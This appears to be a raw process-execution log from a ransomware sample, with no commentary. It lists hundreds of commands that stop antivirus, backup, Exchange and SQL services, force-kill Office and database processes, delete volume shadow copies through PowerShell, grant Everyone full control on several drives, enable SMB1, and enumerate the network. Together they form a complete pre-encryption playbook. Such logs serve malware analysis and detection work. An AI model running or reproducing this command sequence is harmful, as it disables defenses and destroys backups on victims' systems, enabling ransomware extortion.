C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2284102851750714218-17956263341356059538-68260397-1688964880437469013-1505944464"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-367323984289478961-400712025-5575469-1897964322-1857134293-1298701124-1890941733"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1101567333-772160772-62232171180505311-1027584156-493040275-8296030121660249177"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-137596843016207695801466659247-788240315-1946335369-172572203719260333741454974235"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "901099379-1722020870805074732-851632885-1456233066-674386539-1419802802-1527311146"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "189307140238978187249660684893735857661344639-1720596160-2053468275-857941555"
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-844076941-1092393732-1850109459-17565218082059912405-815250841-1429742881-713413756"
C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-68735326-5056036131313275624-2291945142893465241538636704-467938199613081133"
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "683111131349876665-339622279-2105309224149161751542262906-987451766894225895"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "880083956-160111875-19419675551522892634-4900239171820484090-8918060321846682791"
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1409441447-166358734011141505841170503562-53167424812792674551949113955417370641"
C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11503997201525866783-2636398131806831343596679775-19656487391909011136-770565243"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1750091196-1541920400-2012754478-321385066-875635047-322969583-18022786051186940972"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "893441057-1530893456-352293957-1559822984-419533987-457585707769182777-1306135271"
C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\arp.exe
"arp" -a
C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1856244861-16479583311265349185-11306903041158274405-1576223994-3688727521460863706"
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
net view
C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "244172938-1898520942810559031145472652-12320168231070488151-770320977-1578820010"
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1518877750-1753057878-2920150211223463562-1176132614-4931925167650328561741883803"
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-56209806-99784166420517067981251393499782245764148889861711332975201400665353"
C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.7.0.34
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
